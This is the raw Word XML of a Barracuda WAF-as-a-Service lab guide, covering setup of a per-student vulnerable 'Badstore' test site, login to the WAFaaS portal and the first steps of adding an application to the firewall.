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567D8" w:rsidP="30DB4EA1" w:rsidRDefault="7F698058" w14:paraId="4FE99217" w14:textId="497D1A52">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7F698058">
        <w:drawing>
          <wp:inline wp14:editId="0FC730A7" wp14:anchorId="44435BD5">
            <wp:extent cx="1721644" cy="471796"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1052260985" name="Picture 1052260985" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1052260985"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R9b45880e11ea49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21644" cy="471796"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="7F698058">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D6465" w:rsidP="59C4101A" w:rsidRDefault="70401691" w14:paraId="66DF0CE1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidR="70401691">
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008567D8" w:rsidP="00D7043B" w:rsidRDefault="243BD87F" w14:paraId="147A20E3" w14:textId="1BA0F001">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidR="243BD87F">
        <w:rPr/>
        <w:t xml:space="preserve">WAF-as-a-Service </w:t>
      </w:r>
      <w:r w:rsidR="739EE5E2">
        <w:rPr/>
        <w:t xml:space="preserve">Lab Guide </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7043B" w:rsidP="008D6465" w:rsidRDefault="00D7043B" w14:paraId="69D1C2FB" w14:textId="77777777"/>
    <w:p w:rsidRPr="008D6465" w:rsidR="008D6465" w:rsidP="008D6465" w:rsidRDefault="008D6465" w14:paraId="4C13FB78" w14:textId="55AA2818">
      <w:r w:rsidR="008D6465">
        <w:rPr/>
        <w:t xml:space="preserve">Version </w:t>
      </w:r>
      <w:r w:rsidR="1C4AE570">
        <w:rPr/>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="59C4101A" w:rsidRDefault="59C4101A" w14:paraId="7A2BB0D0" w14:textId="2ECAE6A6"/>
    <w:p w:rsidR="59C4101A" w:rsidRDefault="59C4101A" w14:paraId="62D3986C" w14:textId="415A7901">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A859D0" w:rsidR="004B6A8F" w:rsidP="50C40F79" w:rsidRDefault="004B6A8F" w14:paraId="28F8002F" w14:textId="4F1C9B8A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7C1C15DA">
        <w:rPr/>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A859D0" w:rsidR="004B6A8F" w:rsidP="004B6A8F" w:rsidRDefault="004B6A8F" w14:paraId="098FD995" w14:textId="67926020">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="004B6A8F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In this lab guide, you will learn to</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="54937304">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="50C40F79" w:rsidRDefault="32F6121D" w14:paraId="08F5985E" w14:textId="332FED3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="54937304">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Discover vulnerabilities on </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="39F6BC2E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a vulnerable eCommerce test </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="54937304">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="50C40F79" w:rsidRDefault="32F6121D" w14:paraId="239ABB88" w14:textId="768347D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00C34781">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure WAF-as-a-Service to secure the site based on </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="3A7892CE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">several </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="3A7892CE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>requirements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00844F45" w:rsidP="699639B3" w:rsidRDefault="009A3456" w14:paraId="64BA14A6" w14:textId="1E119B02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="009A3456">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">WAFaaS takes a few minutes to sync your changes so after making each change, wait a few minutes </w:t>
      </w:r>
      <w:r w:rsidR="2E6AE2D5">
        <w:rPr/>
        <w:t>until the configuration has synced</w:t>
      </w:r>
      <w:r w:rsidR="0A913DC5">
        <w:rPr/>
        <w:t xml:space="preserve"> to all the WAFaaS datacenters in your global region. </w:t>
      </w:r>
      <w:r w:rsidR="2E6AE2D5">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1360C599">
        <w:drawing>
          <wp:inline wp14:editId="6732412C" wp14:anchorId="40D98FCD">
            <wp:extent cx="4876802" cy="800100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1665211711" name="Picture 1665211711" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1665211711"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R131dd31e0fbd45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76802" cy="800100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="7F15C254" w14:textId="6D783723"/>
    <w:p w:rsidR="009A3456" w:rsidRDefault="009A3456" w14:paraId="62228834" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="50C40F79" w:rsidP="3DB4835F" w:rsidRDefault="50C40F79" w14:paraId="7454F4DD" w14:textId="6AB6DDAF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="166771C1">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="543DCEBE" w:rsidP="3DB4835F" w:rsidRDefault="543DCEBE" w14:paraId="4F935A9C" w14:textId="3B6C35BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:bidi w:val="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166771C1">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure you can browse to </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3DB4835F" w:rsidR="166771C1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://badstore&lt;your</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="166771C1">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> student number</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="166771C1">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;.cudathon.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="7A54AA0A">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="73AC67B2" w:rsidP="3DB4835F" w:rsidRDefault="73AC67B2" w14:paraId="62A8DDB8" w14:textId="401233CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="73AC67B2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This will be referred to throughout the rest of this lab as your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="73AC67B2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="73AC67B2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> D</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="5D68004A">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">omain </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="73AC67B2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7A54AA0A" w:rsidP="3DB4835F" w:rsidRDefault="7A54AA0A" w14:paraId="18506BF6" w14:textId="0394B52A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="7A54AA0A">
        <w:drawing>
          <wp:inline wp14:editId="30ABCD69" wp14:anchorId="684ECAE7">
            <wp:extent cx="4305600" cy="2635800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1437433505" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rf27a53beaefb4654">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4305600" cy="2635800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="50C40F79" w:rsidP="50C40F79" w:rsidRDefault="50C40F79" w14:paraId="07E1EECA" w14:textId="74586E90">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="077BE973">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Log in to Barracuda WAFaaS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="077BE973" w:rsidP="3DB4835F" w:rsidRDefault="077BE973" w14:paraId="231A1F27" w14:textId="7917C7D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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6138FF5A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In your browser, g</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 to </w:t>
      </w:r>
      <w:hyperlink r:id="Rebca7047caee4b63">
        <w:r w:rsidRPr="3DB4835F" w:rsidR="077BE973">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://waas.barracudanetworks.com/</w:t>
        </w:r>
      </w:hyperlink>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77BE973" w:rsidP="3DB4835F" w:rsidRDefault="077BE973" w14:paraId="2C9857C0" w14:textId="7101FA8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>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Log in with the student email and password provided</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="077BE973" w:rsidP="50C40F79" w:rsidRDefault="077BE973" w14:paraId="74688611" w14:textId="5B069202">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="077BE973">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Add your Application to WAFaaS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4CD4A9FA" w:rsidP="3DB4835F" w:rsidRDefault="4CD4A9FA" w14:paraId="14A23051" w14:textId="115AD0EB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="4CD4A9FA">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="4945197D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="15844B2F">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ocumentation </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="2BABDA5D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">can be found </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="4CD4A9FA">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>here</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="17698B89">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="R2c1eb0c26333450e">
        <w:r w:rsidRPr="3DB4835F" w:rsidR="4CD4A9FA">
          <w:rPr>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://campus.barracuda.com/product/WAAS/doc/77399164/getting-started/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="077BE973" w:rsidP="50C40F79" w:rsidRDefault="077BE973" w14:paraId="1D67204D" w14:textId="49AB28E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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50C40F79" w:rsidR="077BE973">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Click Add Application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="077BE973" w:rsidP="3DB4835F" w:rsidRDefault="077BE973" w14:paraId="59B4EFCC" w14:textId="67743E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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n the Websites step, enter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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B</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="42E44363">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>adstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="42E4436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w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="6832D13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pplication Name, and </w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="30240C6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your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="30240C6C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="30240C6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main Name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for the domain</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="3B1391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roofErr w:type="gramStart"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="3B1391DC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="3B1391D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ick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Continue</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077BE973" w:rsidP="3DB4835F" w:rsidRDefault="077BE973" w14:paraId="4B7FB441" w14:textId="527AD442">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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the Protocol Screen, accept the defaults and click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ontinue </w:t>
      </w:r>
      <w:r w:rsidR="077BE973">
        <w:drawing>
          <wp:inline wp14:editId="18C071E6" wp14:anchorId="4923DFEB">
            <wp:extent cx="3318305" cy="2151368"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="414152741" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R9fd3a6bf831b4af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18305" cy="2151368"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
